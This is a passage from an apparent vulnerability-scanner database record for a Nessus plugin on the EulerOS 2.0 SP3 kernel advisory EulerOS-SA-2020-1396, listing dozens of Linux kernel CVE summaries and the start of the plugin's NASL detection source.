"2023-05-18T14:59:11", "description": "According to the versions of the kernel packages installed, the EulerOS installation on the remote host is affected by the following vulnerabilities :\n\n - drivers/gpu/drm/radeon/radeon_display.c in the Linux kernel 5.2.14 does not check the alloc_workqueue return value, leading to a NULL pointer dereference. NOTE: A third-party software maintainer states that the work queue allocation is happening during device initialization, which for a graphics card occurs during boot. It is not attacker controllable and OOM at that time is highly unlikely.(CVE-2019-16230)\n\n - In the Linux kernel 5.4.0-rc2, there is a use-after-free (read) in the __blk_add_trace function in kernel/trace/blktrace.c (which is used to fill out a blk_io_trace structure and place it in a per-cpu sub-buffer).(CVE-2019-19768)\n\n - A flaw was discovered in the way that the KVM hypervisor handled instruction emulation for an L2 guest when nested virtualisation is enabled. Under some circumstances, an L2 guest may trick the L0 guest into accessing sensitive L1 resources that should be inaccessible to the L2 guest.(CVE-2020-2732)\n\n - There is a use-after-free vulnerability in the Linux kernel through 5.5.2 in the vc_do_resize function in drivers/tty/vt/vt.c.(CVE-2020-8647)\n\n - There is a use-after-free vulnerability in the Linux kernel through 5.5.2 in the n_tty_receive_buf_common function in drivers/tty/n_tty.c.(CVE-2020-8648)\n\n - There is a use-after-free vulnerability in the Linux kernel through 5.5.2 in the vgacon_invert_region function in drivers/video/console/vgacon.c.(CVE-2020-8649)\n\n - ext4_protect_reserved_inode in fs/ext4/block_validity.c in the Linux kernel through 5.5.3 allows attackers to cause a denial of service (soft lockup) via a crafted journal size.(CVE-2020-8992)\n\n - An issue was discovered in the Linux kernel through 5.5.6. set_fdc in drivers/block/floppy.c leads to a wait_til_ready out-of-bounds read because the FDC index is not checked for errors before assigning it, aka CID-2e90ca68b0d2.(CVE-2020-9383)\n\n - In kernel/compat.c in the Linux kernel before 3.17, as used in Google Chrome OS and other products, there is a possible out-of-bounds read. restart_syscall uses uninitialized data when restarting compat_sys_nanosleep. NOTE: this is disputed because the code path is unreachable.(CVE-2014-3180)\n\n - A heap-based buffer overflow vulnerability was found in the Linux kernel, version kernel-2.6.32, in Marvell WiFi chip driver. A remote attacker could cause a denial of service (system crash) or, possibly execute arbitrary code, when the lbs_ibss_join_existing function is called after a STA connects to an AP.(CVE-2019-14896)\n\n - A stack-based buffer overflow was found in the Linux kernel, version kernel-2.6.32, in Marvell WiFi chip driver. An attacker is able to cause a denial of service (system crash) or, possibly execute arbitrary code, when a STA works in IBSS mode (allows connecting stations together without the use of an AP) and connects to another STA.(CVE-2019-14897)\n\n - An out-of-bounds memory write issue was found in the Linux Kernel, version 3.13 through 5.4, in the way the Linux kernel's KVM hypervisor handled the 'KVM_GET_EMULATED_CPUID' ioctl(2) request to get CPUID features emulated by the KVM hypervisor. A user or process able to access the '/dev/kvm' device could use this flaw to crash the system, resulting in a denial of service.(CVE-2019-19332)\n\n - In the Linux kernel before 5.3.9, there are multiple out-of-bounds write bugs that can be caused by a malicious USB device in the Linux kernel HID drivers, aka CID-d9d4b1e46d95. This affects drivers/hid/hid-axff.c, drivers/hid/hid-dr.c, drivers/hid/hid-emsff.c, drivers/hid/hid-gaff.c, drivers/hid/hid-holtekff.c, drivers/hid/hid-lg2ff.c, drivers/hid/hid-lg3ff.c, drivers/hid/hid-lg4ff.c, drivers/hid/hid-lgff.c, drivers/hid/hid-logitech-hidpp.c, drivers/hid/hid-microsoft.c, drivers/hid/hid-sony.c, drivers/hid/hid-tmff.c, and drivers/hid/hid-zpff.c.(CVE-2019-19532)\n\n - kernel/sched/fair.c in the Linux kernel before 5.3.9, when cpu.cfs_quota_us is used (e.g., with Kubernetes), allows attackers to cause a denial of service against non-cpu-bound applications by generating a workload that triggers unwanted slice expiration, aka CID-de53fd7aedb1. (In other words, although this slice expiration would typically be seen with benign workloads, it is possible that an attacker could calculate how many stray requests are required to force an entire Kubernetes cluster into a low-performance state caused by slice expiration, and ensure that a DDoS attack sent that number of stray requests. An attack does not affect the stability of the kernel it only causes mismanagement of application execution.)(CVE-2019-19922)\n\n - In the Linux kernel through 5.4.6, there is a NULL pointer dereference in drivers/scsi/libsas/sas_discover.c because of mishandling of port disconnection during discovery, related to a PHY down race condition, aka CID-f70267f379b5.(CVE-2019-19965)\n\n - In the Linux kernel before 5.1.6, there is a use-after-free in cpia2_exit() in drivers/media/usb/cpia2/cpia2_v4l.c that will cause denial of service, aka CID-dea37a972655.(CVE-2019-19966)\n\n - In the Linux kernel before 5.0.6, there is a NULL pointer dereference in drop_sysctl_table() in fs/proc/proc_sysctl.c, related to put_links, aka CID-23da9588037e.(CVE-2019-20054)\n\n - An exploitable denial-of-service vulnerability exists in the Linux kernel prior to mainline 5.3. An attacker could exploit this vulnerability by triggering AP to send IAPP location updates for stations before the required authentication process has completed. This could lead to different denial-of-service scenarios, either by causing CAM table attacks, or by leading to traffic flapping if faking already existing clients in other nearby APs of the same wireless infrastructure.\n An attacker can forge Authentication and Association Request packets to trigger this vulnerability.(CVE-2019-5108)\n\n - In the Linux kernel before 5.1, there is a memory leak in __feat_register_sp() in net/dccp/feat.c, which may cause denial of service, aka CID-1d3ff0950e2b.(CVE-2019-20096)\n\n - Improper invalidation for page table updates by a virtual guest operating system for multiple Intel(R) Processors may allow an authenticated user to potentially enable denial of service of the host system via local access.(CVE-2018-12207)\n\n - Insufficient access control in subsystem for Intel (R) processor graphics in 6th, 7th, 8th and 9th Generation Intel(R) Core(TM) Processor Families Intel(R) Pentium(R) Processor J, N, Silver and Gold Series Intel(R) Celeron(R) Processor J, N, G3900 and G4900 Series Intel(R) Atom(R) Processor A and E3900 Series Intel(R) Xeon(R) Processor E3-1500 v5 and v6 and E-2100 Processor Families may allow an authenticated user to potentially enable denial of service via local access.(CVE-2019-0154)\n\n - Insufficient access control in a subsystem for Intel (R) processor graphics in 6th, 7th, 8th and 9th Generation Intel(R) Core(TM) Processor Families Intel(R) Pentium(R) Processor J, N, Silver and Gold Series Intel(R) Celeron(R) Processor J, N, G3900 and G4900 Series Intel(R) Atom(R) Processor A and E3900 Series Intel(R) Xeon(R) Processor E3-1500 v5 and v6, E-2100 and E-2200 Processor Families Intel(R) Graphics Driver for Windows before 26.20.100.6813 (DCH) or 26.20.100.6812 and before 21.20.x.5077 (aka15.45.5077), i915 Linux Driver for Intel(R) Processor Graphics before versions 5.4-rc7, 5.3.11, 4.19.84, 4.14.154, 4.9.201, 4.4.201 may allow an authenticated user to potentially enable escalation of privilege via local access.(CVE-2019-0155)\n\n - TSX Asynchronous Abort condition on some CPUs utilizing speculative execution may allow an authenticated user to potentially enable information disclosure via a side channel with local access.(CVE-2019-11135)\n\n - Linux kernel CIFS implementation, version 4.9.0 is vulnerable to a relative paths injection in directory entry lists.(CVE-2019-10220)\n\n - A heap overflow flaw was found in the Linux kernel, all versions 3.x.x and 4.x.x before 4.18.0, in Marvell WiFi chip driver. The vulnerability allows a remote attacker to cause a system crash, resulting in a denial of service, or execute arbitrary code. The highest threat with this vulnerability is with the availability of the system. If code execution occurs, the code will run with the permissions of root. This will affect both confidentiality and integrity of files on the system.(CVE-2019-14901)\n\n - The vmw_gb_surface_define_ioctl function in drivers/gpu/drm/vmwgfx/vmwgfx_surface.c in the Linux kernel through 4.10.7 does not validate certain levels data, which allows local users to cause a denial of service (system hang) via a crafted ioctl call for a /dev/dri/renderD* device.(CVE-2017-7346)\n\n - A heap-based buffer overflow was discovered in the Linux kernel, all versions 3.x.x and 4.x.x before 4.18.0, in Marvell WiFi chip driver. The flaw could occur when the station attempts a connection negotiation during the handling of the remote devices country settings. This could allow the remote device to cause a denial of service (system crash) or possibly execute arbitrary code.(CVE-2019-14895)\n\n - An issue was discovered in the Linux kernel through 5.2.9. There is a NULL pointer dereference caused by a malicious USB device in the flexcop_usb_probe function in the drivers/media/usb/b2c2/flexcop-usb.c driver.(CVE-2019-15291)\n\n - The Linux kernel through 5.3.13 has a start_offset+size Integer Overflow in cpia2_remap_buffer in drivers/media/usb/cpia2/cpia2_core.c because cpia2 has its own mmap implementation. This allows local users (with /dev/video0 access) to obtain read and write permissions on kernel physical pages, which can possibly result in a privilege escalation.(CVE-2019-18675)\n\n - In the AppleTalk subsystem in the Linux kernel before 5.1, there is a potential NULL pointer dereference because register_snap_client may return NULL. This will lead to denial of service in net/appletalk/aarp.c and net/appletalk/ddp.c, as demonstrated by unregister_snap_client, aka CID-9804501fa122.(CVE-2019-19227)\n\n - In the Linux kernel before 5.3.7, there is a use-after-free bug that can be caused by a malicious USB device in the drivers/usb/misc/adutux.c driver, aka CID-44efc269db79.(CVE-2019-19523)\n\n - In the Linux kernel before 5.3.12, there is a use-after-free bug that can be caused by a malicious USB device in the drivers/input/ff-memless.c driver, aka CID-fa3a5a1880c9.(CVE-2019-19524)\n\n - In the Linux kernel before 5.2.10, there is a use-after-free bug that can be caused by a malicious USB device in the drivers/hid/usbhid/hiddev.c driver, aka CID-9c09b214f30e.(CVE-2019-19527)\n\n - In the Linux kernel before 5.3.7, there is a use-after-free bug that can be caused by a malicious USB device in the drivers/usb/misc/iowarrior.c driver, aka CID-edc4746f253d.(CVE-2019-19528)\n\n - In the Linux kernel before 5.2.10, there is a use-after-free bug that can be caused by a malicious USB device in the drivers/usb/class/cdc-acm.c driver, aka CID-c52873e5a1ef.(CVE-2019-19530)\n\n - In the Linux kernel before 5.2.9, there is a use-after-free bug that can be caused by a malicious USB device in the drivers/usb/misc/yurex.c driver, aka CID-fc05481b2fca.(CVE-2019-19531)\n\n - In the Linux kernel before 5.3.4, there is an info-leak bug that can be caused by a malicious USB device in the drivers/media/usb/ttusb-dec/ttusb_dec.c driver, aka CID-a10feaf8c464.(CVE-2019-19533)\n\n - In the Linux kernel before 5.3.11, there is an info-leak bug that can be caused by a malicious USB device in the drivers/net/can/usb/peak_usb/pcan_usb_core.c driver, aka CID-f7a1337f0d29.(CVE-2019-19534)\n\n - In the Linux kernel before 5.2.10, there is a race condition bug that can be caused by a malicious USB device in the USB character device driver layer, aka CID-303911cfc5b9. This affects drivers/usb/core/file.c.(CVE-2019-19536)\n\n - In the Linux kernel before 5.2.10, there is a race condition bug that can be caused by a malicious USB device in the USB character device driver layer, aka CID-303911cfc5b9. This affects drivers/usb/core/file.c.(CVE-2019-19537)\n\n - The xen_biovec_phys_mergeable function in drivers/xen/biomerge.c in Xen might allow local OS guest users to corrupt block device data streams and consequently obtain sensitive memory information, cause a denial of service, or gain host OS privileges by leveraging incorrect block IO merge-ability calculation.(CVE-2017-12134)\n\n - In ashmem_ioctl of ashmem.c, there is an out-of-bounds write due to insufficient locking when accessing asma.\n This could lead to a local elevation of privilege enabling code execution as a privileged process with no additional execution privileges needed. User interaction is not needed for exploitation. Product:\n Android. Versions: Android kernel. Android ID:\n A-66954097.(CVE-2017-13216)\n\n - The acpi_ds_create_operands() function in drivers/acpi/acpica/dsutils.c in the Linux kernel through 4.12.9 does not flush the operand cache and causes a kernel stack dump, which allows local users to obtain sensitive information from kernel memory and bypass the KASLR protection mechanism (in the kernel through 4.9) via a crafted ACPI table.(CVE-2017-13693)\n\n - drivers/net/usb/pegasus.c in the Linux kernel 4.9.x before 4.9.11 interacts incorrectly with the CONFIG_VMAP_STACK option, which allows local users to cause a denial of service (system crash or memory corruption) or possibly have unspecified other impact by leveraging use of more than one virtual page for a DMA scatterlist.(CVE-2017-8068)\n\n - drivers/net/usb/rtl8150.c in the Linux kernel 4.9.x before 4.9.11 interacts incorrectly with the CONFIG_VMAP_STACK option, which allows local users to cause a denial of service (system crash or memory corruption) or possibly have unspecified other impact by leveraging use of more than one virtual page for a DMA scatterlist.(CVE-2017-8069)\n\n - drivers/net/usb/catc.c in the Linux kernel 4.9.x before 4.9.11 interacts incorrectly with the CONFIG_VMAP_STACK option, which allows local users to cause a denial of service (system crash or memory corruption) or possibly have unspecified other impact by leveraging use of more than one virtual page for a DMA scatterlist.(CVE-2017-8070)\n\n - A security flaw was found in the chap_server_compute_md5() function in the ISCSI target code in the Linux kernel in a way an authentication request from an ISCSI initiator is processed. An unauthenticated remote attacker can cause a stack buffer overflow and smash up to 17 bytes of the stack.\n The attack requires the iSCSI target to be enabled on the victim host. Depending on how the target's code was built (i.e. depending on a compiler, compile flags and hardware architecture) an attack may lead to a system crash and thus to a denial-of-service or possibly to a non-authorized access to data exported by an iSCSI target. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although we believe it is highly unlikely. Kernel versions 4.18.x, 4.14.x and 3.10.x are believed to be vulnerable.(CVE-2018-14633)\n\n - A flaw was found in the Linux kernel. A heap based buffer overflow in mwifiex_uap_parse_tail_ies function in drivers/net/wireless/marvell/mwifiex/ie.c might lead to memory corruption and possibly other consequences.(CVE-2019-10126)\n\n - An issue was discovered in net/ipv4/sysctl_net_ipv4.c in the Linux kernel before 5.0.11. There is a net/ipv4/tcp_input.c signed integer overflow in tcp_ack_update_rtt() when userspace writes a very large integer to /proc/sys/net/ipv4/tcp_min_rtt_wlen, leading to a denial of service or possibly unspecified other impact, aka CID-19fad20d15a6.(CVE-2019-18805)\n\n - A memory leak in the ql_alloc_large_buffers() function in drivers/net/ethernet/qlogic/qla3xxx.c in the Linux kernel before 5.3.5 allows local users to cause a denial of service (memory consumption) by triggering pci_dma_mapping_error() failures, aka CID-1acb8f2a7a9f.(CVE-2019-18806)\n\n - A use-after-free in binder.c allows an elevation of privilege from an application to the Linux Kernel. No user interaction is required to exploit this vulnerability, however exploitation does require either the installation of a malicious local application or a separate vulnerability in a network facing application.Product: AndroidAndroid ID:\n A-141720095(CVE-2019-2215)\n\n - arch/arm/mm/dma-mapping.c in the Linux kernel before 3.13 on ARM platforms, as used in Android before 2016-08-05 on Nexus 5 and 7 (2013) devices, does not prevent executable DMA mappings, which might allow local users to gain privileges via a crafted application, aka Android internal bug 28803642 and Qualcomm internal bug CR642735.(CVE-2014-9888)\n\n - A memory leak in the cx23888_ir_probe() function in drivers/media/pci/cx23885/cx23888-ir.c in the Linux kernel through 5.3.11 allows attackers to cause a denial of service (memory consumption) by triggering kfifo_alloc() failures, aka CID-a7b2df76b42b.(CVE-2019-19054)\n\n - A memory leak in the mwifiex_pcie_alloc_cmdrsp_buf() function in drivers/net/wireless/marvell/mwifiex/pcie.c in the Linux kernel through 5.3.11 allows attackers to cause a denial of service (memory consumption) by triggering mwifiex_map_pci_memory() failures, aka CID-db8fd2cde932.(CVE-2019-19056)\n\n - Two memory leaks in the mwifiex_pcie_init_evt_ring() function in drivers/net/wireless/marvell/mwifiex/pcie.c in the Linux kernel through 5.3.11 allow attackers to cause a denial of service (memory consumption) by triggering mwifiex_map_pci_memory() failures, aka CID-d10dcb615c8e.(CVE-2019-19057)\n\n - A memory leak in the adis_update_scan_mode() function in drivers/iio/imu/adis_buffer.c in the Linux kernel before 5.3.9 allows attackers to cause a denial of service (memory consumption), aka CID-ab612b1daf41.(CVE-2019-19060)\n\n - A memory leak in the crypto_report() function in crypto/crypto_user_base.c in the Linux kernel through 5.3.11 allows attackers to cause a denial of service (memory consumption) by triggering(CVE-2019-19062)\n\n - Two memory leaks in the rtl_usb_probe() function in drivers/net/wireless/realtek/rtlwifi/usb.c in the Linux kernel through 5.3.11 allow attackers to cause a denial of service (memory consumption), aka CID-3f9361695113.(CVE-2019-19063)\n\n - A memory leak in the bfad_im_get_stats() function in drivers/scsi/bfa/bfad_attr.c in the Linux kernel through 5.3.11 allows attackers to cause a denial of service (memory consumption) by triggering bfa_port_get_stats() failures, aka CID-0e62395da2bd.(CVE-2019-19066)\n\n - Memory leaks in drivers/net/wireless/ath/ath9k/htc_hst.c in the Linux kernel through 5.3.11 allow attackers to cause a denial of service (memory consumption) by triggering wait_for_completion_timeout() failures. This affects the htc_config_pipe_credits() function, the htc_setup_complete() function, and the htc_connect_service() function, aka CID-853acf7caf10.(CVE-2019-19073)\n\n - A memory leak in the ath9k_wmi_cmd() function in drivers/net/wireless/ath/ath9k/wmi.c in the Linux kernel through 5.3.11 allows attackers to cause a denial of service (memory consumption), aka CID-728c1e2a05e4.(CVE-2019-19074)\n\n - drivers/net/fjes/fjes_main.c in the Linux kernel 5.2.14 does not check the alloc_workqueue return value, leading to a NULL pointer dereference.(CVE-2019-16231)\n\n - drivers/net/wireless/marvell/libertas/if_sdio.c in the Linux kernel 5.2.14 does not check the alloc_workqueue return value, leading to a NULL pointer dereference.(CVE-2019-16232)\n\nNote that Tenable Network Security has extracted the preceding description block directly from the EulerOS security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2020-04-15T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP3 : kernel (EulerOS-SA-2020-1396)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-3180", "CVE-2014-9888", "CVE-2017-12134", "CVE-2017-13216", "CVE-2017-13693", "CVE-2017-7346", "CVE-2017-8068", "CVE-2017-8069", "CVE-2017-8070", "CVE-2018-12207", "CVE-2018-14633", "CVE-2019-0154", "CVE-2019-0155", "CVE-2019-10126", "CVE-2019-10220", "CVE-2019-11135", "CVE-2019-14895", "CVE-2019-14896", "CVE-2019-14897", "CVE-2019-14901", "CVE-2019-15291", "CVE-2019-16230", "CVE-2019-16231", "CVE-2019-16232", "CVE-2019-18675", "CVE-2019-18805", "CVE-2019-18806", "CVE-2019-19054", "CVE-2019-19056", "CVE-2019-19057", "CVE-2019-19060", "CVE-2019-19062", "CVE-2019-19063", "CVE-2019-19066", "CVE-2019-19073", "CVE-2019-19074", "CVE-2019-19227", "CVE-2019-19332", "CVE-2019-19523", "CVE-2019-19524", "CVE-2019-19527", "CVE-2019-19528", "CVE-2019-19530", "CVE-2019-19531", "CVE-2019-19532", "CVE-2019-19533", "CVE-2019-19534", "CVE-2019-19536", "CVE-2019-19537", "CVE-2019-19768", "CVE-2019-19922", "CVE-2019-19965", "CVE-2019-19966", "CVE-2019-20054", "CVE-2019-20096", "CVE-2019-2215", "CVE-2019-5108", "CVE-2020-2732", "CVE-2020-8647", "CVE-2020-8648", "CVE-2020-8649", "CVE-2020-8992", "CVE-2020-9383"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-debuginfo", "p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:python-perf", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2020-1396.NASL", "href": "https://www.tenable.com/plugins/nessus/135525", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(135525);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\n \"CVE-2014-3180\",\n \"CVE-2014-9888\",\n \"CVE-2017-12134\",\n \"CVE-2017-13216\",\n \"CVE-2017-13693\",\n \"CVE-2017-7346\",\n \"CVE-2017-8068\",\n \"CVE-2017-8069\",\n \"CVE-2017-8070\",\n \"CVE-2018-12207\",\n \"CVE-2018-14633\",\n \"CVE-2019-0154\",\n \"CVE-2019-0155\",\n \"CVE-2019-10126\",\n \"CVE-2019-10220\",\n \"CVE-2019-11135\",\n \"CVE-2019-14895\",\n \"CVE-2019-14896\",\n \"CVE-2019-14897\",\n \"CVE-2019-14901\",\n \"CVE-2019-15291\",\n \"CVE-2019-16230\",\n \"CVE-2019-16231\",\n \"CVE-2019-16232\",\n \"CVE-2019-18675\",\n \"CVE-2019-18805\",\n \"CVE-2019-18806\",\n \"CVE-2019-19054\",\n \"CVE-2019-19056\",\n \"CVE-2019-19057\",\n \"CVE-2019-19060\",\n \"CVE-2019-19062\",\n \"CVE-2019-19063\",\n \"CVE-2019-19066\",\n \"CVE-2019-19073\",\n \"CVE-2019-19074\",\n \"CVE-2019-19227\",\n \"CVE-2019-19332\",\n \"CVE-2019-19523\",\n \"CVE-2019-19524\",\n \"CVE-2019-19527\",\n \"CVE-2019-19528\",\n \"CVE-2019-19530\",\n \"CVE-2019-19531\",\n \"CVE-2019-19532\",\n \"CVE-2019-19533\",\n \"CVE-2019-19534\",\n \"CVE-2019-19536\",\n \"CVE-2019-19537\",\n \"CVE-2019-19768\",\n \"CVE-2019-19922\",\n \"CVE-2019-19965\",\n \"CVE-2019-19966\",\n \"CVE-2019-20054\",\n \"CVE-2019-20096\",\n \"CVE-2019-2215\",\n \"CVE-2019-5108\",\n \"CVE-2020-2732\",\n \"CVE-2020-8647\",\n \"CVE-2020-8648\",\n \"CVE-2020-8649\",\n \"CVE-2020-8992\",\n \"CVE-2020-9383\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/03\");\n\n script_name(english:\"EulerOS 2.0 SP3 : kernel (EulerOS-SA-2020-1396)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - drivers/gpu/drm/radeon/radeon_display.c in the Linux\n kernel 5.2.14 does not check the alloc_workqueue return\n value, leading to a NULL pointer dereference. NOTE: A\n third-party software maintainer states that the work\n queue allocation is happening during device\n initialization, which for a graphics card occurs during\n boot. It is not attacker controllable and OOM at that\n time is highly unlikely.(CVE-2019-16230)\n\n - In the Linux kernel 5.4.0-rc2, there is a\n use-after-free (read) in the __blk_add_trace function\n in kernel/trace/blktrace.c (which is used to fill out a\n blk_io_trace structure and place it in a per-cpu\n sub-buffer).(CVE-2019-19768)\n\n - A flaw was discovered in the way that the KVM\n hypervisor handled instruction emulation for an L2\n guest when nested virtualisation is enabled. Under some\n circumstances, an L2 guest may trick the L0 guest into\n accessing sensitive L1 resources that should be\n inaccessible to the L2 guest.(CVE-2020-2732)\n\n - There is a use-after-free vulnerability in the Linux\n kernel through 5.5.2 in the vc_do_resize function in\n drivers/tty/vt/vt.c.(CVE-2020-8647)\n\n - There is a use-after-free vulnerability in the Linux\n kernel through 5.5.2 in the n_tty_receive_buf_common\n function in drivers/tty/n_tty.c.(CVE-2020-8648)\n\n - There is a use-after-free vulnerability in the Linux\n kernel through 5.5.2 in the vgacon_invert_region\n function in\n drivers/video/console/vgacon.c.(CVE-2020-8649)\n\n - ext4_protect_reserved_inode in fs/ext4/block_validity.c\n in the Linux kernel through 5.5.3 allows attackers to\n cause a denial of service (soft lockup) via a crafted\n journal size.(CVE-2020-8992)\n\n - An issue was discovered in the Linux kernel through\n 5.5.6. set_fdc in drivers/block/floppy.c leads to a\n wait_til_ready out-of-bounds read because the FDC index\n is not checked for errors before assigning it, aka\n CID-2e90ca68b0d2.(CVE-2020-9383)\n\n - In kernel/compat.c in the Linux kernel before 3.17, as\n used in Google Chrome OS and other products, there is a\n possible out-of-bounds read. restart_syscall uses\n uninitialized data when restarting\n compat_sys_nanosleep. NOTE: this is disputed because\n the code path is unreachable.(CVE-2014-3180)\n\n - A heap-based buffer overflow vulnerability was found in\n the Linux kernel, version kernel-2.6.32, in Marvell\n WiFi chip driver. A remote attacker could cause a\n denial of service (system crash) or, possibly execute\n arbitrary code, when the lbs_ibss_join_existing\n function is called after a STA connects to an\n AP.(CVE-2019-14896)\n\n - A stack-based buffer overflow was found in the Linux\n kernel, version kernel-2.6.32, in Marvell WiFi chip\n driver. An attacker is able to cause a denial of\n service (system crash) or, possibly execute arbitrary\n code, when a STA works in IBSS mode (allows connecting\n stations together without the use of an AP) and\n connects to another STA.(CVE-2019-14897)\n\n - An out-of-bounds memory write issue was found in the\n Linux Kernel, version 3.13 through 5.4, in the way the\n Linux kernel's KVM hypervisor handled the\n 'KVM_GET_EMULATED_CPUID' ioctl(2) request to get CPUID\n features emulated by the KVM hypervisor. A user or\n process able to access the '/dev/kvm' device could use\n this flaw to crash the system, resulting in a denial of\n service.(CVE-2019-19332)\n\n - In the Linux kernel before 5.3.9, there are multiple\n out-of-bounds write bugs that can be caused by a\n malicious USB device in the Linux kernel HID drivers,\n aka CID-d9d4b1e46d95. This affects\n drivers/hid/hid-axff.c, drivers/hid/hid-dr.c,\n drivers/hid/hid-emsff.c, drivers/hid/hid-gaff.c,\n drivers/hid/hid-holtekff.c, drivers/hid/hid-lg2ff.c,\n drivers/hid/hid-lg3ff.c, drivers/hid/hid-lg4ff.c,\n drivers/hid/hid-lgff.c,\n drivers/hid/hid-logitech-hidpp.c,\n drivers/hid/hid-microsoft.c, drivers/hid/hid-sony.c,\n drivers/hid/hid-tmff.c, and\n drivers/hid/hid-zpff.c.(CVE-2019-19532)\n\n - kernel/sched/fair.c in the Linux kernel before 5.3.9,\n when cpu.cfs_quota_us is used (e.g., with Kubernetes),\n allows attackers to cause a denial of service against\n non-cpu-bound applications by generating a workload\n that triggers unwanted slice expiration, aka\n CID-de53fd7aedb1. (In other words, although this slice\n expiration would typically be seen with benign\n workloads, it is possible that an attacker could\n calculate how many stray requests are required to force\n an entire Kubernetes cluster into a low-performance\n state caused by slice expiration, and ensure that a\n DDoS attack sent that number of stray requests. An\n attack does not affect the stability of the kernel it\n only causes mismanagement of application\n execution.)(CVE-2019-19922)\n\n - In the Linux kernel through 5.4.6, there is a NULL\n pointer dereference in\n drivers/scsi/libsas/sas_discover.c because of\n mishandling of port disconnection during discovery,\n related to a PHY down race condition, aka\n CID-f70267f379b5.(CVE-2019-19965)\n\n - In the Linux kernel before 5.1.6, there is a\n use-after-free in cpia2_exit() in\n drivers/media/usb/cpia2/cpia2_v4l.c that will cause\n denial of service, aka\n CID-dea37a972655.(CVE-2019-19966)\n\n - In the Linux kernel before 5.0.6, there is a NULL\n pointer dereference in drop_sysctl_table() in\n fs/proc/proc_sysctl.c, related to put_links, aka\n CID-23da9588037e.(CVE-2019-20054)\n\n - An exploitable denial-of-service vulnerability exists\n in the Linux kernel prior to mainline 5.3. An attacker\n could exploit this vulnerability by triggering AP to\n send IAPP location updates for stations before the\n required authentication process has completed. This\n could lead to different denial-of-service scenarios,\n either by causing CAM table attacks, or by leading to\n traffic flapping if faking already existing clients in\n other nearby APs of the same wireless infrastructure.\n An attacker can forge Authentication and Association\n Request packets to trigger this\n vulnerability.(CVE-2019-5108)\n\n - In the Linux kernel before 5.1, there is a memory leak\n in __feat_register_sp() in net/dccp/feat.c, which may\n cause denial of service, aka\n CID-1d3ff0950e2b.(CVE-2019-20096)\n\n - Improper invalidation for page table updates by a\n virtual guest operating system for multiple Intel(R)\n Processors may allow an authenticated user to\n potentially enable denial of service of the host system\n via local access.(CVE-2018-12207)\n\n - Insufficient access control in subsystem for Intel (R)\n processor graphics in 6th, 7th, 8th and 9th Generation\n Intel(R) Core(TM) Processor Families Intel(R)\n Pentium(R) Processor J, N, Silver and Gold Series\n Intel(R) Celeron(R) Processor J, N, G3900 and G4900\n Series Intel(R) Atom(R) Processor A and E3900 Series\n Intel(R) Xeon(R) Processor E3-1500 v5 and v6 and E-2100\n Processor Families may allow an authenticated user to\n potentially enable denial of service via local\n access.(CVE-2019-0154)\n\n - Insufficient access control in a subsystem for Intel\n (R) processor graphics in 6th, 7th, 8th and 9th\n Generation Intel(R) Core(TM) Processor Families\n Intel(R) Pentium(R) Processor J, N, Silver and Gold\n Series Intel(R) Celeron(R) Processor J, N, G3900 and\n G4900 Series Intel(R) Atom(R) Processor A and E3900\n Series Intel(R) Xeon(R) Processor E3-1500 v5 and v6,\n E-2100 and E-2200 Processor Families Intel(R) Graphics\n Driver for Windows before 26.20.100.6813 (DCH) or\n 26.20.100.6812 and before 21.20.x.5077 (aka15.45.5077),\n i915 Linux Driver for Intel(R) Processor Graphics\n before versions 5.4-rc7, 5.3.11, 4.19.84, 4.14.154,\n 4.9.201, 4.4.201 may allow an authenticated user to\n potentially enable escalation of privilege via local\n access.(CVE-2019-0155)\n\n - TSX Asynchronous Abort condition on some CPUs utilizing\n speculative execution may allow an authenticated user\n to potentially enable information disclosure via a side\n channel with local access.(CVE-2019-11135)\n\n - Linux kernel CIFS implementation, version 4.9.0 is\n vulnerable to a relative paths injection in directory\n entry lists.(CVE-2019-10220)\n\n - A heap overflow flaw was found in the Linux kernel, all\n versions 3.x.x and 4.x.x before 4.18.0, in Marvell WiFi\n chip driver. The vulnerability allows a remote attacker\n to cause a system crash, resulting in a denial of\n service, or execute arbitrary code. The highest threat\n with this vulnerability is with the availability of the\n system. If code execution occurs, the code will run\n with the permissions of root. This will affect both\n confidentiality and integrity of files on the\n system.(CVE-2019-14901)\n\n - The vmw_gb_surface_define_ioctl function in\n drivers/gpu/drm/vmwgfx/vmwgfx_surface.c in the Linux\n kernel through 4.10.7 does not validate certain levels\n data, which allows local users to cause a denial of\n service (system hang) via a crafted ioctl call for a\n /dev/dri/renderD* device.(CVE-2017-7346)\n\n - A heap-based buffer overflow was discovered in the\n Linux kernel, all versions 3.x.x and 4.x.x before\n 4.18.0, in Marvell WiFi chip driver. The flaw could\n occur when the station attempts a connection\n negotiation during the handling of the remote devices\n country settings. This could allow the remote device to\n cause a denial of service (system crash) or possibly\n execute arbitrary code.(CVE-2019-14895)\n\n - An issue was discovered in the Linux kernel through\n 5.2.9. There is a NULL pointer dereference caused by a\n malicious USB device in the flexcop_usb_probe function\n in the drivers/media/usb/b2c2/flexcop-usb.c\n driver.(CVE-2019-15291)\n\n - The Linux kernel through 5.3.13 has a start_offset+size\n Integer Overflow in cpia2_remap_buffer in\n drivers/media/usb/cpia2/cpia2_core.c because cpia2 has\n its own mmap implementation. This allows local users\n (with /dev/video0 access) to 